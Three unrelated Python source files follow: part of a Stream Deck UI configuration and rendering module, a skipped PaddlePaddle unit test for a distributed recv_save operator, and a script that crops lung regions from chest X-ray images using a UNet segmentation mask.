brightness_change = get_button_change_brightness(deck_id, page, key)
if brightness_change:
change_brightness(deck_id, brightness_change)
# Page switch
switch_page = get_button_switch_page(deck_id, page, key)
if switch_page:
set_page(deck_id, switch_page - 1)
def _save_state():
export_config(STATE_FILE)
def _open_config(config_file: str):
global state
with open(config_file) as state_file:
config = json.loads(state_file.read())
file_version = config.get("streamdeck_ui_version", 0)
if file_version != CONFIG_FILE_VERSION:
raise ValueError(
"Incompatible version of config file found: "
f"{file_version} does not match required version "
f"{CONFIG_FILE_VERSION}."
)
state = {}
for deck_id, deck in config["state"].items():
deck["buttons"] = {
int(page_id): {int(button_id): button for button_id, button in buttons.items()}
for page_id, buttons in deck.get("buttons", {}).items()
}
state[deck_id] = deck
def import_config(config_file: str) -> None:
_open_config(config_file)
render()
_save_state()
def export_config(output_file: str) -> None:
with open(output_file, "w") as state_file:
state_file.write(
json.dumps(
{"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
indent=4,
separators=(",", ": "),
)
)
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
"""Opens and then returns all known stream deck devices"""
for deck in DeviceManager.DeviceManager().enumerate():
deck.open()
deck.reset()
deck_id = deck.get_serial_number()
decks[deck_id] = deck
deck.set_key_callback(partial(_key_change_callback, deck_id))
return {
deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
for deck_id, deck in decks.items()
}
def ensure_decks_connected() -> None:
"""Reconnects to any decks that lost connection. If they did, re-renders them."""
for deck_serial, deck in decks.copy().items():
if not deck.connected():
for new_deck in DeviceManager.DeviceManager().enumerate():
try:
new_deck.open()
new_deck_serial = new_deck.get_serial_number()
except Exception as error:
warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
new_deck_serial = None
if new_deck_serial == deck_serial:
deck.close()
new_deck.reset()
new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
decks[new_deck_serial] = new_deck
render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
return {"type": decks[deck_id].deck_type(), "layout": decks[deck_id].key_layout()}
def _button_state(deck_id: str, page: int, button: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
buttons_state = buttons.setdefault(page, {}) # type: ignore
return buttons_state.setdefault(button, {}) # type: ignore
class LiveFunction:
def __init__(self, deck_id: str, page: int, button: int, function_to_run, args):
self.deck_id = deck_id
self.page = page
self.button = button
self.function = function_to_run
self.function_args = args
def __eq__(self, other):
if self.deck_id != other.deck_id:
return False
if self.page != other.page:
return False
if self.button != other.button:
return False
if self.function != other.function:
return False
if self.function_args != other.function_args:
return False
return True
def __hash__(self):
return hash(f"{self.deck_id}{self.page}{self.button}")
def remove_all_from_btn(self):
lf_to_remove = []
for live_function in live_functions:
if self.deck_id == live_function.deck_id and self.page == live_function.page and self.button == live_function.button:
lf_to_remove.append(live_function)
for lf in lf_to_remove:
live_functions.remove(lf)
def btn_has_diff_function_running(self):
return any(self.deck_id == f.deck_id and self.page == f.page and self.button == f.button and (self.function != f.function or self.function_args != f.function_args) for f in live_functions)
def _set_button_live_info(deck_id: str, page: int, button: int, start: bool, func, *args):
import threading
live_function = LiveFunction(deck_id, page, button, func, *args)
if not start:
live_function.remove_all_from_btn()
# Clear Text
set_button_info(deck_id, page, button, "")
return
if live_function.btn_has_diff_function_running():
live_function.remove_all_from_btn()
# Already registered, skip and carry on
if live_function in live_functions:
return
live_functions.append(live_function)
# Ensure we don't kick off multiple threads at once
thread_name = "live_updater"
if any(thread.name == thread_name for thread in threading.enumerate()):
return
thread = threading.Thread(name=thread_name, target=_start_live_updater)
thread.daemon = True
thread.start()
def set_button_live_time(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display live time every second"""
_button_state(deck_id, page, button)["font_size"] = 14
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H:%M:%S"])
def _get_current_time(date_format: str):
from datetime import datetime
return datetime.now().strftime(date_format)
def set_button_live_hour(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current hour"""
# Set Font
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H"])
def set_button_live_minute(deck_id: str, page: int, button: int, start: bool) -> None:
"""Set the button to display the current minute"""
_button_state(deck_id, page, button)["font_size"] = 48
_set_button_live_info(deck_id, page, button, start, _get_current_time, ["%M"])
def _start_live_updater():
import time
while len(live_functions) > 0:
for live_function in live_functions:
result = live_function.function(*live_function.function_args)
set_button_info(live_function.deck_id, live_function.page, live_function.button, result)
time.sleep(1)
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
"""Set the text associated with a button"""
_button_state(deck_id, page, button)["text"] = text
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_text(deck_id: str, page: int, button: int) -> str:
"""Returns the text set for the specified button"""
return _button_state(deck_id, page, button).get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
"""Sets the icon associated with a button"""
_button_state(deck_id, page, button)["icon"] = icon
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_icon(deck_id: str, page: int, button: int) -> str:
"""Returns the icon set for a particular button"""
return _button_state(deck_id, page, button).get("icon", "")
def set_button_info(deck_id: str, page: int, button: int, info: str) -> None:
"""Set the information associated with a button"""
_button_state(deck_id, page, button)["information"] = info
image_cache.pop(f"{deck_id}.{page}.{button}", None)
render()
_save_state()
def get_button_info(deck_id: str, page: int, button: int) -> str:
"""Returns the information set for the specified button"""
return _button_state(deck_id, page, button).get("information", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
"""Sets the brightness changing associated with a button"""
_button_state(deck_id, page, button)["brightness_change"] = amount
render()
_save_state()
def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
"""Returns the brightness change set for a particular button"""
return _button_state(deck_id, page, button).get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
"""Sets the command associated with the button"""
_button_state(deck_id, page, button)["command"] = command
_save_state()
def get_button_command(deck_id: str, page: int, button: int) -> str:
"""Returns the command set for the specified button"""
return _button_state(deck_id, page, button).get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
"""Sets the page switch associated with the button"""
_button_state(deck_id, page, button)["switch_page"] = switch_page
_save_state()
def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
"""Returns the page switch set for the specified button. 0 implies no page switch."""
return _button_state(deck_id, page, button).get("switch_page", 0)
def set_button_information_index(deck_id: str, page: int, button: int, info_index: int) -> None:
"""Sets the Information index for the given button"""
_button_state(deck_id, page, button)["information_index"] = info_index
_save_state()
def get_button_information_index(deck_id: str, page: int, button: int) -> int:
"""Returns the index of the 'Information' dropdown for the specified button."""
return _button_state(deck_id, page, button).get("information_index", 0)
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
"""Sets the keys associated with the button"""
_button_state(deck_id, page, button)["keys"] = keys
_save_state()
def get_button_keys(deck_id: str, page: int, button: int) -> str:
"""Returns the keys set for the specified button"""
return _button_state(deck_id, page, button).get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
"""Sets the text meant to be written when button is pressed"""
_button_state(deck_id, page, button)["write"] = write
_save_state()
def get_button_write(deck_id: str, page: int, button: int) -> str:
"""Returns the text to be produced when the specified button is pressed"""
return _button_state(deck_id, page, button).get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
"""Sets the brightness for every button on the deck"""
decks[deck_id].set_brightness(brightness)
state.setdefault(deck_id, {})["brightness"] = brightness
_save_state()
def get_brightness(deck_id: str) -> int:
"""Gets the brightness that is set for the specified stream deck"""
return state.get(deck_id, {}).get("brightness", 100) # type: ignore
def change_brightness(deck_id: str, amount: int = 1) -> None:
"""Change the brightness of the deck by the specified amount"""
set_brightness(deck_id, max(min(get_brightness(deck_id) + amount, 100), 0))
def get_page(deck_id: str) -> int:
"""Gets the current page shown on the stream deck"""
return state.get(deck_id, {}).get("page", 0) # type: ignore
def set_page(deck_id: str, page: int) -> None:
"""Sets the current page shown on the stream deck"""
state.setdefault(deck_id, {})["page"] = page
render()
_save_state()
def render() -> None:
"""renders all decks"""
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
page = get_page(deck_id)
for button_id, button_settings in (
deck_state.get("buttons", {}).get(page, {}).items() # type: ignore
):
key = f"{deck_id}.{page}.{button_id}"
if key in image_cache:
image = image_cache[key]
else:
image = _render_key_image(deck, **button_settings)
image_cache[key] = image
deck.set_key_image(button_id, image)
def _render_key_image(deck, icon: str = "", text: str = "", information: str = "", font: str = DEFAULT_FONT, **kwargs):
"""Renders an individual key image"""
image = ImageHelpers.PILHelper.create_image(deck)
draw = ImageDraw.Draw(image)
font_size = kwargs.get("font_size") if kwargs.get("font_size") else 14
# Give information priority over text
if information:
text = information
if icon:
rgba_icon = Image.open(icon).convert("RGBA")
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_width, icon_height = image.width, image.height
if text:
icon_height -= 20
rgba_icon.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((image.width - rgba_icon.width) // 2, 0)
image.paste(rgba_icon, icon_pos, rgba_icon)
if text:
true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), font_size)
label_w, label_h = draw.textsize(text, font=true_font)
if icon:
label_pos = ((image.width - label_w) // 2, image.height - 20)
else:
label_pos = ((image.width - label_w) // 2, ((image.height - label_h) // 2))
draw.text(label_pos, text=text, font=true_font, fill="white")
return ImageHelpers.PILHelper.to_native_format(deck, image)
if os.path.isfile(STATE_FILE):
_open_config(STATE_FILE)
|
test_recv_save_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import shutil
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
from paddle.fluid.transpiler.details import VarStruct, VarsDistributed
from dist_test_utils import *
from paddle.fluid.incubate.fleet.parameter_server.mode import DistributedMode
def run_pserver(pserver_id):
remove_ps_flag(os.getpid())
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((5, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10 + 1
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"distributed_mode": DistributedMode.SYNC,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
@unittest.skip("do not need currently")
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, ))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_nce_op_two_pserver(self, place, port0, port1, model_file):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
# create and run recv and save operator
remote_recv_op = Operator(
"recv_save",
trainer_id=0,
shape=[10, 8],
slice_shapes=["5,8", "5,8"],
slice_varnames=["table", "table"],
remote_varnames=['table', 'table'],
is_sparse=False,
endpoints=emaps,
file_path=model_file)
remote_recv_op.run(scope, place)
def _load_slice_var(self, model_file):
load_prog = fluid.Program()
load_block = load_prog.global_block()
origin = load_block.create_var(
name="var.origin",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[10, 8],
dtype="float32",
persistable=True)
slice0 = load_block.create_var(
name="var.slice0",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[3, 8],
dtype="float32",
persistable=True)
slice1 = load_block.create_var(
name="var.slice1",
type=fluid.core.VarDesc.VarType.LOD_TENSOR,
shape=[5, 8],
dtype="float32",
persistable=True)
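# The 'seek' attributes below appear to be counted in tensor elements: each row of
# the saved (10, 8) parameter holds 8 floats, so seek=2*8 starts slice0 at row 2
# (rows 2:5) and seek=5*8 starts slice1 at row 5 (rows 5:10), which is consistent
# with the asserts against origin[2:5] and origin[5:10] further down.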
load_block.append_op(
type='load',
inputs={},
outputs={'Out': [origin]},
attrs={'file_path': model_file})
load_block.append_op(
type='load',
inputs={},
outputs={'Out': [slice0]},
attrs={
'file_path': model_file,
'seek': 2 * 8,
'shape': slice0.shape
})
load_block.append_op(
type='load',
inputs={},
outputs={'Out': [slice1]},
attrs={
'file_path': model_file,
'seek': 5 * 8,
'shape': slice1.shape
})
exe = fluid.Executor(place=fluid.CPUPlace())
exe.run(load_prog)
origin_var = fluid.global_scope().find_var("var.origin")
slice0_var = fluid.global_scope().find_var("var.slice0")
slice1_var = fluid.global_scope().find_var("var.slice1")
origin = np.array(origin_var.get_tensor())
slice0 = np.array(slice0_var.get_tensor())
slice1 = np.array(slice1_var.get_tensor())
np.testing.assert_equal(origin[2:5], slice0)
np.testing.assert_equal(origin[5:10], slice1)
def _save_by_io_persistables(self, place, port0, port1, dirname, var_name):
self._run_nce_op_two_pserver(place, port0, port1,
os.path.join(dirname, var_name))
def test_recv_save_op_remote(self):
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
param_dir = "./model_for_test_recv_save_op/"
param_name = "table"
for place in places:
self._save_by_io_persistables(place, port0, port1, param_dir,
param_name)
# send SIGINT to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
self._load_slice_var(param_dir + param_name)
shutil.rmtree(param_dir)
if __name__ == '__main__':
unittest.main()
|
crop_img.py
|
import numpy as np
from skimage import io, color, exposure, img_as_float, transform, util
from matplotlib import pyplot as plt
import pathlib
import cv2
import multiprocessing
import time
import argparse
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
import os
def load_CXR_from_list(filelist, im_shape):
X = np.zeros((len(filelist), im_shape[0], im_shape[1], 1))
resized_raw = np.zeros((len(filelist), im_shape[0], im_shape[1]))
raw_images = []
for k, file in enumerate(filelist):
if file.suffix.lower() in ['.jpg', '.png', '.jpeg']:
print('loading ' + file.name)
img = img_as_float(io.imread(file, as_gray = True))
raw_images.append(img)
img = transform.resize(img, im_shape)
resized_raw[k, ...] = img
img = exposure.equalize_hist(img)
img = np.expand_dims(img, -1)
X[k, ...] = img
# X = np.array(X)
# resized_raw = np.array(resized_raw)
X -= X.mean()
X /= X.std()
print ('### Dataset loaded')
print ('X shape ={} \t raw_resized shape = {}'.format(X.shape, resized_raw.shape))
print ('\tX:{:.1f}-{:.1f}\n'.format(X.min(), X.max()))
print ('\tX.mean = {}, X.std = {}'.format(X.mean(), X.std()))
return X, resized_raw, raw_images
def masked(img, mask, alpha=1):
"""Returns image with GT lung field outlined with red, predicted lung field
filled with blue."""
rows, cols = img.shape
color_mask = np.zeros((rows, cols, 3))
color_mask[..., 2] = mask / 255
img_color = np.dstack((img, img, img))
img_hsv = color.rgb2hsv(img_color)
color_mask_hsv = color.rgb2hsv(color_mask)
img_hsv[..., 0] = color_mask_hsv[..., 0]
img_hsv[..., 1] = color_mask_hsv[..., 1] * alpha
img_masked = color.hsv2rgb(img_hsv)
return img_masked
def draw_spine(img, spine_pos):
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
cv2.rectangle(img_color, (spine_pos, 0), (spine_pos, img.shape[0]), color = (0.8, 0 , 0), thickness = int(round(max(img.shape) * 0.02)))
return img_color
def draw_bbox(img, bbox):
'''
input img, and bounding box
return a color RGB image (img.shape, 3) with bounding box drawn
original img is not changed.
'''
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (bbox is None):
left, top, right, bottom = bbox
cv2.rectangle(img_color, (left, top), (right, bottom), color = (0, 0.8, 0), thickness = int(round(max(img.shape) * 0.01)))
return img_color
def join_path_from_list(cur_path, path_list):
for folder in path_list:
cur_path = cur_path.joinpath(folder)
return cur_path
def change_first_folder(data_path, attached_str):
to_return = data_path.copy()
to_return[0] = to_return[0] + attached_str
return to_return
def select_spine(img):
sumpix0 = np.sum(img, axis = 0)
max_r2 = np.int_(len(sumpix0) / 3) + np.argmax(sumpix0[ np.int_(len(sumpix0) / 3): np.int_(len(sumpix0)* 2 / 3)])
return max_r2
def mirror(spine_pos, pos):
if pos < spine_pos:
return spine_pos + (spine_pos - pos)
else:
return spine_pos - (pos - spine_pos)
def left_right(label_map, label, spine_pos):
left_chunk_size = np.sum(label_map[:, 0 : spine_pos] == label)
right_chunk_size = np.sum(label_map[:, spine_pos + 1 :] == label)
if left_chunk_size > right_chunk_size:
return 'left'
elif left_chunk_size < right_chunk_size:
return 'right'
else:
return 'mid'
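# select_lung (below) works roughly as follows: morphologically open the
# prediction with a k_size x k_size kernel, label connected components, drop
# components smaller than cut_thresh * image area, and keep the two largest as
# the lungs. If only one lung-sized component survives (or both end up on the
# same side), its bounding box is mirrored across the spine column (the column
# with the highest intensity sum in the middle third of the image, see
# select_spine) to approximate the missing side.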
def select_lung(pred, resized_raw, cut_thresh, debug, filename,out_pad_size, k_size = 5):
opened = cv2.morphologyEx(pred, cv2.MORPH_OPEN, kernel = np.ones((k_size, k_size)))
cnt, label_map, stats, centriods = cv2.connectedComponentsWithStats(opened)
# index sorted by area, from large to small, first one is the background
idx_sorted = np.argsort(stats[:, cv2.CC_STAT_AREA])[::-1]
stats = stats[idx_sorted]
# remove small connected region
if debug:
print(stats)
stats = stats[stats[:, cv2.CC_STAT_AREA] > cut_thresh * np.prod(pred.shape)]
# only keep the two largest connected components (background excluded)
denoised = np.zeros(opened.shape, dtype = np.uint8)
for i in range(1, min(stats.shape[0], 3)):
denoised[label_map == idx_sorted[i]] = 255
spine_pos = select_spine(resized_raw)
if stats.shape[0] < 3:
if stats.shape[0] == 1:
print(filename + ' No large enough area Detected!!!')
return denoised, None, spine_pos
else:
print(filename + ' Single Lung Detected !!!')
top = stats[1, cv2.CC_STAT_TOP]
bottom = stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT]
left = stats[1, cv2.CC_STAT_LEFT]
right = stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH]
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
else:
left = min(stats[1, cv2.CC_STAT_LEFT], stats[2, cv2.CC_STAT_LEFT])
top = min(stats[1, cv2.CC_STAT_TOP], stats[2, cv2.CC_STAT_TOP])
right = max(
stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH],
stats[2, cv2.CC_STAT_LEFT] + stats[2, cv2.CC_STAT_WIDTH]
)
bottom = max(
stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT],
stats[2, cv2.CC_STAT_TOP] + stats[2, cv2.CC_STAT_HEIGHT]
)
chunk1_side = left_right(label_map, 1, spine_pos)
chunk2_side = left_right(label_map, 2, spine_pos)
# print('chunk1 on' + chunk1_side + ' chunk2 on ' + chunk2_side)
if chunk1_side == chunk2_side:
print(filename + ' two chunks on the same side!!!')
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
bbox = np.array([left, top, right, bottom])
bbox = out_pad(bbox, denoised.shape, out_pad_size)
# boxed = cv2.rectangle(denoised, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color = 255, thickness=3)
# return denoised, bbox, denoised_no_bbox, raw_bbox
return denoised, bbox, spine_pos
def out_pad(bbox_in, shape, out_pad_size):
left, top, right, bottom = bbox_in
left = max(0, left - out_pad_size)
# right = min(shape[1] - 1, right + out_pad_size)
right = min(shape[1] , right + out_pad_size)
top = max(0, top - out_pad_size)
# bottom = min(shape[0] - 1, bottom + out_pad_size)
bottom = min(shape[0], bottom + out_pad_size)
bbox_padded = np.array([left, top, right, bottom])
return bbox_padded
def square_helper(start, finish, expand1, expand2, size_limit):
new_start = max(0, start - expand1)
expand1_rem = expand1 - (start - new_start)
new_finish = min(size_limit , finish + expand2)
expand2_rem = expand2 - (new_finish - finish)
# print('expand1_rem = ', expand1_rem, ' expand2_rem = ', expand2_rem)
if expand1_rem > 0 and expand2_rem == 0:
new_finish = min(size_limit, new_finish + expand1_rem)
elif expand1_rem == 0 and expand2_rem > 0:
new_start = max(0, new_start - expand2_rem)
return new_start, new_finish
def square_bbox(img_shape, raw_bbox):
if raw_bbox is None:
return None
# img_shape = denoised_no_bbox.shape
left, top, right, bottom = raw_bbox
width = right - left
height = bottom - top
center = [round((left + right) / 2), round((top + bottom) / 2)]
diff = abs(width - height)
expand1 = diff // 2
expand2 = diff - expand1
sqaured_bbox = np.copy(raw_bbox)
# print('expand1 = ', expand1, ' expand2 = ', expand2)
if width > height:
new_top, new_bottom = square_helper(top, bottom, expand1, expand2, img_shape[0])
sqaured_bbox = np.array([left, new_top, right, new_bottom])
elif width < height:
new_left, new_right = square_helper(left, right, expand1, expand2, img_shape[1])
sqaured_bbox = np.array([new_left, top, new_right, bottom])
# print('original bounding box:' + str(raw_bbox))
# print('squared bounding box:' + str(sqaured_bbox))
return sqaured_bbox
def bbox_mask_and_crop(raw_img, bbox):
'''
Return the cropped image and the bounding box itself.
'''
if bbox is None:
return raw_img, bbox
left, top, right, bottom = bbox
cropped_img = raw_img[
top : bottom,
left : right
]
return cropped_img, bbox
def square_crop(raw_img, raw_bbox):
if raw_bbox is None:
return raw_img, raw_bbox
sqaured_bbox = square_bbox(raw_img.shape, raw_bbox)
return bbox_mask_and_crop(raw_img, sqaured_bbox)
def crop_lung(raw_img, cur_shape, bbox):
if bbox is None:
return raw_img, None
if len(bbox) != 4:
raise ValueError('WRONG length of bounding box')
left, top, right, bottom = bbox
raw_height = raw_img.shape[0]
raw_width = raw_img.shape[1]
cur_height = cur_shape[0]
cur_width = cur_shape[1]
# print('Bounding box = {}'.format(bbox))
# print('raw shape = {}'.format(raw_img.shape))
# print('cur shape = {}'.format(cur_shape))
lung_top = int(round(top / cur_height * raw_height))
lung_bottom = int(round(bottom / cur_height * raw_height))
lung_left = int(round(left / cur_width * raw_width))
lung_right = int(round(right / cur_width * raw_width))
# print('lung left = {} right = {} top = {} bottom = {} '.format(lung_left, lung_right, lung_top, lung_bottom))
lung_img = raw_img[
lung_top : lung_bottom,
lung_left : lung_right
]
# print('lung shape = {}'.format(lung_img.shape))
raw_bbox = np.array([lung_left, lung_top, lung_right, lung_bottom])
return bbox_mask_and_crop(raw_img, raw_bbox)
def pretty(filename, char_per_line):
return '\n'.join(filename[i : i + char_per_line] for i in range(0, len(filename), char_per_line))
def single_img_crop(img, resized_raw_img, raw_img, file_path, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None , debugging = False):
'''
Crop out the lung area from CXR for single images\n
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet : keras model
loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
result_folder : preferably pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug_folder : preferably pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
Returns
----------
lung_img : np array
cropped lung area (not necessarily squared)
lung_img_squared :
cropped lung area (squared if possible)
'''
# we need (n, x, x, 1) format for input of Unet
# n is the number of images
# x is the input shape, by default 256
if len(img.shape) == 4 and img.shape[1: -1] == im_shape and img.shape[-1] == 1:
# format (n, x, x, 1)
pass
elif len(img.shape) == 2 and img.shape == im_shape:
# format (x, x)
img = np.expand_dims(img, axis = (0, -1))
elif len(img.shape) == 3 and img.shape[:2] == im_shape and img.shape[-1] == 1:
# format (x, x, 1)
img = np.expand_dims(img, axis = 0)
elif len(img.shape) == 3 and img.shape[1:] == im_shape:
# format (n, x, x)
img = np.expand_dims(img, axis = -1)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (debug_folder is None) or debugging:
fig, axes = plt.subplots(2, 2, figsize = (8, 8))
fig2, axes2 = plt.subplots(1, 3, figsize = (18, 6))
pred = np.squeeze(UNet.predict(img))
pr = (pred > 0.5).astype(np.uint8)
if file_path is not None:
filename = file_path.stem
suffix = file_path.suffix
print('outputting result for ' + filename)
denoised, raw_bbox, spine_pos = select_lung(pr, resized_raw_img, cut_thresh = cut_thresh, debug = debugging, filename = filename, out_pad_size = out_pad_size)
# denoised_sqaured, sqaured_bbox = square_bbox(denoised_no_bbox, raw_bbox)
lung_img, nonSquared_bbox = crop_lung(raw_img, im_shape, raw_bbox)
lung_img_squared, sqaured_bbox = square_crop(raw_img, nonSquared_bbox)
lung_img = util.img_as_ubyte(lung_img)
lung_img_squared = util.img_as_ubyte(lung_img_squared)
if not (debug_folder is None) or debugging:
axes[0, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_resized_raw')
axes[0, 0].imshow(resized_raw_img, cmap='gray')
axes[0, 0].set_axis_off()
axes[1, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_rawpred')
axes[1, 0].imshow(pr ,cmap='gray')
axes[1, 0].set_axis_off()
axes[0, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_pred')
axes[0, 1].imshow(denoised, cmap='gray')
axes[0, 1].set_axis_off()
axes[1, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_masked')
area_masked = masked(resized_raw_img, denoised, alpha = 0.6)
bbox_drawn = draw_bbox(area_masked, raw_bbox)
spine_drawn = draw_spine(bbox_drawn, spine_pos)
axes[1, 1].imshow(spine_drawn)
axes[1, 1].set_axis_off()
fig.tight_layout()
axes2[0].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'raw_img')
axes2[0].imshow(raw_img, cmap='gray')
# axes2[0].set_axis_off()
axes2[1].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'unsquared_bounding_box' + '\n' + str(nonSquared_bbox))
axes2[1].imshow(draw_bbox(raw_img, nonSquared_bbox))
# axes2[1].set_axis_off()
axes2[2].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'squared_bounding_box'+ '\n' + str(sqaured_bbox))
axes2[2].imshow(draw_bbox(raw_img, sqaured_bbox))
fig.tight_layout()
if debugging:
plt.show()
elif not (debug_folder is None):
out_path = debug_folder.joinpath(filename + '_debug_resized_scale' + suffix)
fig.savefig(str(out_path))
out_path = debug_folder.joinpath(filename + '_debug_rawscale' + suffix)
fig2.savefig(str(out_path))
if not debugging:
if result_folder is not None:
result_sub = result_folder.joinpath('crop')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop' + suffix)
io.imsave(str(out_path), lung_img )
result_sub = result_folder.joinpath('crop_squared')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop_squared' + suffix)
io.imsave(str(out_path), lung_img_squared )
if not (debug_folder is None) or debugging:
plt.close(fig)
plt.close(fig2)
return lung_img, lung_img_squared
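# A minimal, hypothetical usage sketch for single_img_crop (file names and the
# pre-trained UNet weights file are assumptions; see also the commented example
# at the bottom of this file):
#     UNet = load_model('trained_model.hdf5', compile=False)
#     files = [pathlib.Path('cxr.png')]
#     X, resized_raw, raw_images = load_CXR_from_list(files, (256, 256))
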